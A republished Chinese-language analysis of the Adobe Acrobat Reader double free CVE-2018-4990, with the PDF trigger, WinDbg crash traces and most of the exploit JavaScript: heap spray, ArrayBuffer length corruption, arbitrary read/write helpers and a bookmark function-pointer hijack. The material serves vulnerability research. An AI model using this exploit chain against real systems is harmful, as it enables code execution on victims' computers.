针对Adobe Double Free（CVE-2018-4990）的利用分析-低调大师

针对Adobe Double Free（CVE-2018-4990）的利用分析

2018-05-24 621

在本文中我将介绍攻击者如何利用CVE-2018-4990，这是在处理特制JPEG2000图像时在Acrobat Reader中的越界读取漏洞。

介绍

由于Acrobat Reader的使用很广泛，这使得我决定去试试对这一漏洞进行分析。目前我对AcroRd32.exe（c4c6f8680efeedafa4bb7a71d1a6f0cd37529ffc）v2018.011.20035的所有测试均已完成。显然其他版本也有受到影响，请参阅Adobe的公告apsb18-09了解更多详情。

深入探寻漏洞的根源

我需要做的第一件事就是解压缩PDF，因为许多对象被压缩，隐藏了真正的功能，如JavaScript和图像。我比较喜欢使用pdf工具包，因为它是命令行驱动的。

c:\> pdftk 4b672deae5c1231ea20ea70b0bf091164ef0b939e2cf4d142d31916a169e8e01 output poc.pdf uncompress

由于我没有JPEG2000图像的原始样本，因此我不知道该图像是否已翻转过，所以我只能深入研究JavaScript。剥去JavaScript的其余部分后，我们可以看到以下代码会触发读取的界限：

function trigger(){
 var f = this.getField("Button1");
 if(f){
 f.display = display.visible;
 }
}
trigger();

JavaScript来自根节点触发的OpenAction：

1 0 obj 
<<
/Length 130
>>
stream
function trigger(){
 var f = this.getField("Button1");
 if(f){
 f.display = display.visible;
 }
}
trigger();
endstream 
endobj
 
...
 
5 0 obj 
<<
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 6 0 R
/AcroForm 7 0 R
/Type /Catalog
>>
endobj 
6 0 obj 
<<
/JS 1 0 R
/Type /Action
/S /JavaScript
>>
endobj 
 
...
 
trailer
 
<<
/Root 5 0 R
/Size 39
>>

在启用页面堆栈和用户模式堆栈跟踪的情况下，我们会获得以下崩溃：

(a48.1538): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=d0d0d0b0 ebx=00000000 ecx=d0d0d000 edx=d0d0d0b0 esi=020e0000 edi=020e0000
eip=66886e88 esp=0022a028 ebp=0022a074 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8:
66886e88 813abbbbcdab cmp dword ptr [edx],0ABCDBBBBh ds:0023:d0d0d0b0=????????
0:000> kv
ChildEBP RetAddr Args to Child 
0022a074 66886f95 020e1000 d0d0d0d0 020e0000 verifier!AVrfpDphFindBusyMemoryNoCheck+0xb8 (FPO: [SEH])
0022a098 66887240 020e1000 d0d0d0d0 0022a108 verifier!AVrfpDphFindBusyMemory+0x15 (FPO: [2,5,0])
0022a0b4 66889080 020e1000 d0d0d0d0 0078d911 verifier!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20 (FPO: [2,3,0])
0022a0d0 777969cc 020e0000 01000002 d0d0d0d0 verifier!AVrfDebugPageHeapFree+0x90 (FPO: [3,3,0])
0022a118 77759e07 020e0000 01000002 d0d0d0d0 ntdll!RtlDebugFreeHeap+0x2f (FPO: [SEH])
0022a20c 777263a6 00000000 d0d0d0d0 387e2f98 ntdll!RtlpFreeHeap+0x5d (FPO: [SEH])
0022a22c 7595c614 020e0000 00000000 d0d0d0d0 ntdll!RtlFreeHeap+0x142 (FPO: [3,1,4])
0022a240 5df7ecfa 020e0000 00000000 d0d0d0d0 kernel32!HeapFree+0x14 (FPO: [3,0,0])
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Acrobat Reader DC\Reader\JP2KLib.dll - 
0022a254 667d0574 d0d0d0d0 7ea9257c 69616fac MSVCR120!free+0x1a (FPO: [Non-Fpo]) (CONV: cdecl) [f:\dd\vctools\crt\crtw32\heap\free.c @ 51]
WARNING: Stack unwind information not available. Following frames may be wrong.
0022a374 667e6482 35588fb8 4380cfd8 000000fd JP2KLib!JP2KCopyRect+0xbae6
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.dll - 
0022a3cc 511d6cfc 36496e88 68d96fd0 4380cfd8 JP2KLib!JP2KImageInitDecoderEx+0x24
0022a454 511d8696 3570afa8 69616fac 3570afa8 AcroRd32_50be0000!AX_PDXlateToHostEx+0x261843
0022a4b4 511cd785 69616fac 0022a4d4 511d6640 AcroRd32_50be0000!AX_PDXlateToHostEx+0x2631dd
0022a4c0 511d6640 69616fac 462f6f70 41826fc8 AcroRd32_50be0000!AX_PDXlateToHostEx+0x2582cc
0022a4d4 50dc030d 69616fac 41826fd0 41826fc8 AcroRd32_50be0000!AX_PDXlateToHostEx+0x261187
0022a510 50dbf92b c0010000 0000000d 41826fc8 AcroRd32_50be0000!PDMediaQueriesGetCosObj+0x7867d
0022a5e0 50dbebc6 0022a988 00000000 60b2d137 AcroRd32_50be0000!PDMediaQueriesGetCosObj+0x77c9b
0022a930 50dbeb88 0022a988 45c3aa50 60b2d163 AcroRd32_50be0000!PDMediaQueriesGetCosObj+0x76f36
0022a964 50dbea71 41826e28 45c3aa50 0022aa1c AcroRd32_50be0000!PDMediaQueriesGetCosObj+0x76ef8
0022a9d0 50dbd949 c0010000 0000000d 45c3aa50 AcroRd32_50be0000!PDMediaQueriesGetCosObj+0x76de1

我们可以看到，免费的调用者是JP2KLib！接下来让我们深入该功能JP2KCopyRect + 0xbae6，看看到底发生了什么。

我们可以看到我们实际上处于循环操作中。代码循环遍历主要用于从缓冲区中读取值的索引，它尝试读取的缓冲区大小为0x3f4。所以如果索引是0xfd，我们有一个从缓冲区+（0xfd * 0x4）== 0x3f4的读取，这是第一个越界的双字符。现在我们如果继续循环最后一次（0xfe <0xff），那么我们就会获得另一个双字符的第二次越界读取。因此这个bug实际上可以读取8个字节的越界。

如果它读取的值不为空，则代码将超出边界值作为第一个参数推送到sub_10066FEA并调用它。

接下来我们将在push eax上的调用者之前设置一个断点来检查发生了什么。

Breakpoint 1 hit
eax=d0d0d0d0 ebx=00000000 ecx=000000fd edx=00000001 esi=33b6cf98 edi=68032e88
eip=667e056e esp=0028a724 ebp=0028a838 iopl=0 nv up ei ng nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000282
JP2KLib!JP2KCopyRect+0xbae0:
667e056e 50 push eax
0:000> bl
 0 e 667e056e 0001 (0001) 0:**** JP2KLib!JP2KCopyRect+0xbae0
0:000> dd poi(esi+0x48)+0x4 L1
4732cfe4 000000ff
0:000> r ecx
ecx=000000fd

我们可以清楚地看到上界是0xff，当前索引是0xfd。我不确定这个上限值是否可控，display.visible的常量实际上是0。

这实际上取决于sub_10066FEA对越界值（eax）所做的操作，他会确定此bug的利用率。但是我们已经知道它最终试图释放第一个参数。所以基本上这就是一个越界的读取，他可以导致两个任意的空值。

一个有趣的观点是，很多漏洞都是通过格式错误的静态内容和动态内容访问以及操纵格式错误的内容来触发的。这种类型的模糊是困难的，因为它需要在单个模糊迭代中结合基于突变和基于生成的模糊策略。

利用

因此，为了达到任意空闲，攻击者需要执行以下操作：

1.加载PDF，在字段按钮内部解析（推测）畸形的JP2K图像。

2.分配大量的ArrayBuffer，它们只是大于读出边界的缓冲区

3.设置精确的索引（即249和250），指出攻击者想要释放的内容

4.释放第二个ArrayBuffer，以便分配将落入一个插槽中

5.触发实际分配到一个插槽并读越界限的错误，释放这两个指针

这就是JavaScript代码的样子：

var a = new Array(0x3000);
var spraynum = 0x1000;
var sprayarr = new Array(spraynum);
var spraylen = 0x10000-24;
var spraybase = 0x0d0e0048;
var spraypos = 0x0d0f0058;
 
// force allocations to prepare the heap for the oob read
for(var i1 = 1; i1 < 0x3000; i1++){
 a[i] = new Uint32Array(252);
 a1[i1][249] = spraybase;
 a1[i1][250] = spraybase + 0x10000;
}
 
// heap spray to land ArrayBuffers at 0x0d0e0048 and 0x0d0f0048
for(var i1 = 1; i1 < spraynum; i++){
 sprayarr[i1] = new ArrayBuffer(spraylen);
}
 
// make holes so the oob read chunk lands here
for(var i1 = 1; i1 < 0x3000; i1 = i1 + 2){
 delete a[i1];
 a[i1] = null;
}

实际上，这段代码正在试图去获得空值：

1. Alloc TypedArray 2. Free TypedArray 3. Alloc from JP2KLib 4. OOB Read + free!
+--------------------+ +---------------------+ +---------------------+ +---------------------+
| | | | | +-----------------+ | | +-----------------+ |
| | | | | | | | | | | +-----+
| | | | | | | | | | | +---+ |
| | +--> | | +--> | |Size: 0x3f4 | | +--> | |Size: 0x3f4 | | | |
| | | | | +-----------------+ | | +-----------------+ | | |
| +249: 0x0d0e0048 | | +249: 0x0d0e0048 | | +249: 0x0d0e0048 | | +249: 0x0d0e0048 | <-+ |
| +250: 0x0d0e0048 | | +250: 0x0d0e0048 | | +250: 0x0d0e0048 | | +250: 0x0d0e0048 | <---+
+--------------------+ +---------------------+ +---------------------+ +---------------------+
Size: 0x400 Size: 0x400 Size: 0x400 Size: 0x400

因为252 * 4是0x3F0，所以使用的大小252。然后如果我们添加标题（0x10），则总数为0x400。这足以在目标缓冲区的顶部分配8个字节来利用越界的读取。

因此，攻击者可以释放两个大小为0x10000的缓冲区，这使得它们在JavaScript中具有很好的免费使用条件，因为它们已经引用了sprayarr。由于缓冲区是连续的，所以发生合并并且释放的缓冲区变成大小0x20000。

所以在两个空值发生之后，我们在这个状态下留下堆。

1. Spray Heap 2. Trigger arbitrary free 3. Trigger arbitrary free 4. Coalesce the 2 chunks
+------------------------+ +------------------------+ +------------------------+ +------------------------+
| | | | | | | |
| Size: 0x10000 | | Size: 0x10000 | | Size: 0x10000 | | Size: 0x10000 |
| | | | | | | |
| +--------------+ | | +--------------+ | | +--------------+ | | +--------------+ |
| | | | | | | | | | | | | | | |
| | Allocated | | | | Allocated | | | | Allocated | | | | Allocated | |
| | | | | | | | | | | | | | | |
| +--------------+ | | +--------------+ | | +--------------+ | | +--------------+ |
| +--------------+ | | +--------------+ | | +--------------+ | | +--------------+ |
| | | | | | | | | | | | | | | |
| | Allocated | | +--> | | Freed | | +--> | | Freed | |+-- | | Freed | |
| | | | | | | | | | | | | | | chunks | |
| +--------------+ | | +--------------+ | | +--------------+ | --> | | coalesced | |
| +--------------+ | | +--------------+ | | +--------------+ | --> | | size: | |
| | | | | | | | | | | | | | | 0x20000 | |
| | Allocated | | | | Allocated | | +--> | | Freed | |+-- | | | |
| | | | | | | | | | | | | | | |
| +--------------+ | | +--------------+ | | +--------------+ | | +--------------+ |
| | | | | | | |
+------------------------+ +------------------------+ +------------------------+ +------------------------+

现在所有攻击者需要做的是分配一个大小为0x20000的TypedArray，并使用sprayarr引用，找到它来覆盖下一个ArrayBuffer的字节长度。

// reclaims the memory, like your typical use after free
 for(var i1 = 1; i1 < 0x40; i1++){
 sprayarr2[i1] = new ArrayBuffer(0x20000-24);
 }
 
 // look for the TypedArray that is 0x20000 in size
 for(var i1 = 1; i1 < spraynum; i1++){
 if( sprayarr[i1].byteLength == 0x20000-24){
 
 // this is the magic, overwrite the next TypedArray's byte length
 var biga = new DataView(sprayarr[i1]);
 
 // offset to the byte length in the header
 biga.setUint32(0x10000 - 12, 0x66666666);
 
 // +1 because the next reference as a corrupted length now.
 if(sprayarr[i1 + 1].byteLength == 0x66666666){
 
 // game over attackers can read/write out of biga
 biga = new DataView(sprayarr[i1 + 1]);
 
 ...

现在他们知道哪个TypedArray很大了（if（sprayarr [i] .byteLength == 0x20000-24）），然后它们用它来覆盖相邻ArrayBuffer的字节长度（var biga = new DataView（sprayarr [i ]）; biga.setUint32（0x10000-12,0×66666666）;）。他们只检查下一个ArrayBuffer是否具有匹配的字节长度（如果（sprayarr [i + 1] .byteLength == 0x66666666）），并且如果它确实存在，那么它们使用DataView相对读取/写出相邻的ArrayBuffer （biga = new DataView（sprayarr [i + 1]）;）。

在这个阶段，他们需要将这个原语升级为整个进程空间中的完整读/写原语，以便泄露TypedArray的指针和基址。

 var arr = new Array(0x10000);
 for(var i2 = 0x10; i2 < 0x10000; i2++)
 arr[i2] = new Uint32Array(1);
 for(var i2 = 1; i2 < 0x10; i2++){
 arr[i2] = new Uint32Array(sprayarr[i1 + i2]);
 
 // set the index into the first element of the TypedArray
 // so that the attackers where they are
 arr[i2][0] = i2;
 }
 
 for(var i2 = 0x30000; i2 < (0x10000 * 0x10); i2 = i2 + 4)
 {
 if( biga.getUint32(i2, true) == spraylen && biga.getUint32(i2 + 4, true) > spraypos ){
 
 // save a reference to the relative read/write TypedArray
 mydv = biga;
 
 // leak the index
 var itmp = mydv.getUint32(i2 + 12, true);
 
 // get a reference to TypedArray that they overwrite
 myarray = arr1[itmp];
 
 // get the index where the pointer of the TypedArray is
 mypos = biga.getUint32(i2 + 4, true) - spraypos + 0x50;
 
 // set its byte length to a stupid number also
 mydv.setUint32(mypos - 0x10, 0x100000, true);
 
 // leak the pointer of the TypedArray
 myarraybase = mydv.getUint32(mypos, true);

对于完整的读写原语，它们使用mypos和他们要读取/写入的地址覆盖存储在arr Array的第一个元素中的TypedArray指针，执行读/写操作，然后将指针指向TypedArray返回基址（myarraybase）。

function myread(addr){
 mydv.setUint32(mypos, addr, true);
 var res = myarray[0];
 mydv.setUint32(mypos, myarraybase, true);
 return res;
}
 
function mywrite(addr, value){
 mydv.setUint32(mypos, addr, true);
 myarray[0] = value;
 mydv.setUint32(mypos, myarraybase, true);
 }

自然而然的，他们需要使用一些辅助函数来使用新的读/写原语。事实上到这里，游戏就结束了。他们本来可能只进行一次数据攻击，但是由于Acrobat Reader没有控制流程防护（CFG），所以他们选择了传统的呼叫控制流程。首先，他们找到了EScript.api并获得了dll的基址，然后他们用dll加载程序存根创建了一个rop链，将其全部存储在myarray中。TypedArray覆盖了书签对象的执行函数指针，其中myarray的基地址用于最终重定向执行流。

var bkm = this.bookmarkRoot; 
var objescript = 0x23A59BA4 - 0x23800000 + dll_base;
objescript = myread(objescript);
 
...
 
mywrite(objescript, 0x6b707d06 - 0x6b640000 + dll_base); 
mywrite(objescript + 4, myarraybase);
mywrite(objescript + 0x598,0x6b68389f - 0x6b640000 + dll_base);
 
// adios!
bkm.execute();

对于攻击者来说，Adobe Acrobat Reader仍然是一个很好的目标，因为JavaScript对ArrayBuffers非常灵活，PDF解析非常复杂。操作系统缓解的影响很小，因此Adobe选择加强其二进制文件（/ GUARD：CF）以加大开发难度。如果Adobe启用了CFG并开发了一种孤立堆的形式（就像他们使用flash一样），那么这个bug可能更难以利用。

如前所述，这个示例看起来还处于积极的发展阶段，JavaScript没有对其进行模糊处理，但这确实是一个不错的漏洞，因为我确信JP2KLib.dll中存在许多其他漏洞。尽管如此，这仍然是一个奇妙的漏洞和非常好的一次利用！

原文发布时间为：2018-05-25

本文来自云栖社区合作伙伴“嘶吼网”，了解相关信息可以关注“嘶吼网”。

微信关注我们

原文链接：https://yq.aliyun.com/articles/596863

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

Go 实现自动检索 API 错误码代码行并打印成文档，例 markDown 形式等

作者：林冠宏 / 指尖下的幽灵掘金：https://juejin.im/user/587f0dfe128fe100570ce2d8 博客：http://www.cnblogs.com/linguanh/ GitHub ： https://github.com/af913337456/ 腾讯云专栏： https://cloud.tencent.com/developer/user/1148436/activities 源码--GitHub：https://github.com/af913337456/ErrorDocAutoPrinter 如果你是一个后端Server程序开发人员。你应该知道，在你写完API之后，是需要给客户端的同学提供调用文档的。例如下面一个api handler，创建一个用户。 func HandleCreateUser(w http.ResponseWriter,r *http.Request) map[string]interface{} { if r.Body == nil { return util.GetCommonErr(23,"create user...

2018-05-25

605

总结 1. 攻击者用被黑的凭证登录WordPress.com账户。 2. 如果WordPress.com上的账户被设定为通过Jetpack插件管理所有的WordPress安装，攻击者就可以利用这样的访问在目标站点上安装恶意“pluginsamonsters”插件。 3. 该插件可以给攻击者对目标站点的完全控制。该插件在WordPress.com的面板上是可见的，但当激活后就不可见了。要想该攻击产生，必须满足下面的条件： · 网站所有者必须安装Jetpack。 · Jetpack必须配置为允许用WordPress.com账户来管理站点。 · WordPress.com账户的凭证必须被黑。这种情况通常发生在在其他被黑的站点或服务上重用邮箱或密码。 · WordPress.com没有开启双因子认证。攻击入口：WordPress.com弱凭证和Jetpack Jetpack是非常流行的WordPress插件，有很多的特征。为了使用Jetpack，必须在WordPress.com上创建一个账号。这样就可以在WordPress.com的中央控制器来管理多个WordPress站点。其中一个特点就...

2018-05-25

627

资源下载

更多资源

优质分享App

近一个月的开发和优化，本站点的第一个app全新上线。该app采用极致压缩，本体才4.36MB。系统里面做了大量数据访问、缓存优化。方便用户在手机上查看文章。后续会推出HarmonyOS的适配版本。

腾讯云软件源

为解决软件依赖安装时官方源访问速度慢的问题，腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构，目前腾讯云软件源站支持公网访问和内网访问。

Rocky Linux

Rocky Linux（中文名：洛基）是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版，作为CentOS稳定版停止维护后与RHEL（Red Hat Enterprise Linux）完全兼容的开源替代方案，由社区拥有并管理，支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性，采用模块化包装和SELinux安全架构，默认包含GNOME桌面环境及XFS文件系统，支持十年生命周期更新。

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能，例如代码缩略图，Python的插件，代码段等。还可自定义键绑定，菜单和工具栏。Sublime Text 的主要功能包括：拼写检查，书签，完整的 Python API ， Goto 功能，即时项目切换，多选择，多窗口等等。Sublime Text 是一个跨平台的编辑器，同时支持Windows、Linux、Mac OS X等操作系统。